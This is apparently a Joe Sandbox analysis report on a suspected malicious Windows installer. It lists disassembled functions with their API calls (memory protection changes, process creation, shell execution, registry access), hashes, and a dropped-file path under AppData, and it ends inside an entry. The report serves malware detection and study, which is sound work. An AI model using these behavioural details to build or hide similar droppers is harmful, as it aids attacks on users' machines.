                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction ID: 2902185137110ca2ffdb2282e3c832ce644deeff7f1201e2b4f2572205eed693
                                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction Fuzzy Hash: D0E08C3221021AABCF109E508C01EEB3BACFF043A0F014432FD12EB042D230E9229BA4
                                                          Function 6FC42A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(6FC4505C,00000004,00000040,6FC4504C), ref: 6FC42A9D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3994841b8d82a1da1a8c53e604499ff48789200274fe639c38e549c72da0e5b1
                                                          • Instruction ID: 6761292f3389b468029a9cea52c357481170b30edbb95b8b1ec25a4db7626a03
                                                          • Opcode Fuzzy Hash: 3994841b8d82a1da1a8c53e604499ff48789200274fe639c38e549c72da0e5b1
                                                          • Instruction Fuzzy Hash: F8F0A5B8504A86DECB60EF2C84447093BF0B70B334B144D2AE348D6288E374406CCBA1
                                                          Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                          • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                          • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                          • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                          Function 004063E4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406472,?,?,?,?,Call,?,00000000), ref: 00406408
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction ID: 12ce3b422fe6a0da393528f22193a7488631f194d1dbc4d2354a9349d97d7052
                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction Fuzzy Hash: 34D0123204020DBBEF115F90DD01FAB3B1DEB08310F018836FE06A4091D776D570A758
                                                          Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
                                                          • Instruction ID: cd4f68ad1bc4df61111a8e6125a37bec327b368bc2224c93a9ffc6bdd58994c4
                                                          • Opcode Fuzzy Hash: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
                                                          • Instruction Fuzzy Hash: 74D05B72B08101D7DB00DBE89B49A9E77A4DB50378B31853BD111F11D4D7B8C545A71D
                                                          Function 00404542 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                          • Instruction ID: 6ad8b1d984edffd0e08e34c6f36dd165e1dcb54a73607e2b540eae92d4c67d50
                                                          • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                          • Instruction Fuzzy Hash: ACC04C717402007BDA209F549D49F1777546790702F1495397351E51E0C674E550D61C
                                                          Function 0040350A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 00403518
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                          Function 0040452B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                          • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                          • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                          • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                          Function 00405B9D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 00405BAC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                          • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                          Function 00404518 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,004042EF), ref: 00404522
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                          • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                          • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                          • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                          Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                            • Part of subcall function 00406A16: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A27
                                                            • Part of subcall function 00406A16: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A49
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                          • Instruction ID: 3bd5da99d2ff211530604a8704e688701187be5a7f5114c752edafe9c60b233e
                                                          • Opcode Fuzzy Hash: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                          • Instruction Fuzzy Hash: 82F0F6329041119BDB20BBA18A895DE76A4CF00318F21803FE202B21C6CBBC4D41AB6E
                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                          • Instruction ID: 33bc48e2b41eb1a57acea8eab1ee3944d72ccc7503d83e75cfd502536df4b4aa
                                                          • Opcode Fuzzy Hash: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                          • Instruction Fuzzy Hash: F9D0A773A146008BD744EBB8BE8549F73E8EB903293215C3BD102E10D1E778C901561C

                                                          Non-executed Functions

                                                          Function 004049E7 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                          • lstrcmpiW.KERNEL32(Call,0042CA68,00000000,?,?), ref: 00404B4E
                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404B5A
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                            • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                            • Part of subcall function 00406825: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                            • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                            • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                            • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: <c$A$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                          • API String ID: 2624150263-3369209954
                                                          • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                          • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                          Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                          Strings
                                                          • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 0040228E
                                                          Memory Dump Source
